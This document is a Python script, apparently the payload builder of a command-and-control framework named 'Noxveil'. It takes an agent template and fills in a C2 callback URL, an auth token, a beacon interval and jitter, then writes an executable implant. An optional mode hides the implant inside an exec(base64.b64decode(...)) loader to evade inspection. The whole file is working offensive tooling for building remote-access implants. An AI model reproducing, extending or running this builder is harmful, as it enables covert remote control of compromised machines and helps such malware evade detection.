import argparse
import base64
import os
import sys
from datetime import datetime


DEFAULT_DATA_DIR = "./data"
DEFAULT_TUNNEL_URL_FILE = os.path.join(DEFAULT_DATA_DIR, "tunnel_url.txt")


def get_saved_tunnel_url() -> str:
    if not os.path.exists(DEFAULT_TUNNEL_URL_FILE):
        return ""
    with open(DEFAULT_TUNNEL_URL_FILE, "r", encoding="utf-8") as url_file:
        return url_file.read().strip()


def generate_agent_payload(
    c2_url: str,
    callback_interval: int = 5,
    jitter: int = 2,
    auth_token: str = "replace-me-with-a-bootstrap-token",
    obfuscate: bool = False,
) -> str:
    agent_path = os.path.join(os.path.dirname(__file__), "agent.py")
    if not os.path.exists(agent_path):
        raise FileNotFoundError(f"Agent source not found at: {agent_path}")

    with open(agent_path, "r", encoding="utf-8") as source_file:
        agent_code = source_file.read()

    agent_code = agent_code.replace('C2_URL = "__C2_URL_PLACEHOLDER__"', f'C2_URL = "{c2_url}"')
    agent_code = agent_code.replace('AGENT_AUTH_TOKEN = "__AUTH_TOKEN_PLACEHOLDER__"', f'AGENT_AUTH_TOKEN = "{auth_token}"')
    agent_code = agent_code.replace("DEFAULT_CALLBACK_INTERVAL = 5", f"DEFAULT_CALLBACK_INTERVAL = {callback_interval}")
    agent_code = agent_code.replace("DEFAULT_JITTER = 2", f"DEFAULT_JITTER = {jitter}")

    header = (
        "#!/usr/bin/env python3\n"
        f"# Generated: {datetime.utcnow().isoformat()}Z\n"
        "# Generated by agent_builder.py\n\n"
    )
    payload = header + agent_code

    if not obfuscate:
        return payload

    encoded_payload = base64.b64encode(payload.encode("utf-8")).decode("ascii")
    return (
        "#!/usr/bin/env python3\n"
        "import base64\n"
        "exec(base64.b64decode(\n"
        f'    "{encoded_payload}"\n'
        ").decode('utf-8'))\n"
    )


def main():
    parser = argparse.ArgumentParser(description="Build Noxveil agent payloads with embedded configuration")
    parser.add_argument("--url", type=str, default=None, help="Noxveil URL (auto-detected if tunnel_url.txt exists)")
    parser.add_argument("--output", "-o", type=str, default=None, help="Output file path (stdout if omitted)")
    parser.add_argument("--interval", type=int, default=5, help="Callback interval in seconds")
    parser.add_argument("--jitter", type=int, default=2, help="Jitter in seconds")
    parser.add_argument("--token", type=str, default="replace-me-with-a-bootstrap-token", help="Bootstrap token")
    parser.add_argument("--obfuscate", action="store_true", help="Wrap the payload in a base64 loader")
    args = parser.parse_args()

    c2_url = args.url or get_saved_tunnel_url()
    if not c2_url:
        print("ERROR: No Noxveil URL provided and no saved tunnel URL found.", file=sys.stderr)
        sys.exit(1)

    payload = generate_agent_payload(
        c2_url=c2_url,
        callback_interval=args.interval,
        jitter=args.jitter,
        auth_token=args.token,
        obfuscate=args.obfuscate,
    )

    if not args.output:
        print(payload)
        return

    with open(args.output, "w", encoding="utf-8") as output_file:
        output_file.write(payload)
    os.chmod(args.output, 0o755)
    print(f"[*] Payload written to: {args.output}")


if __name__ == "__main__":
    main()
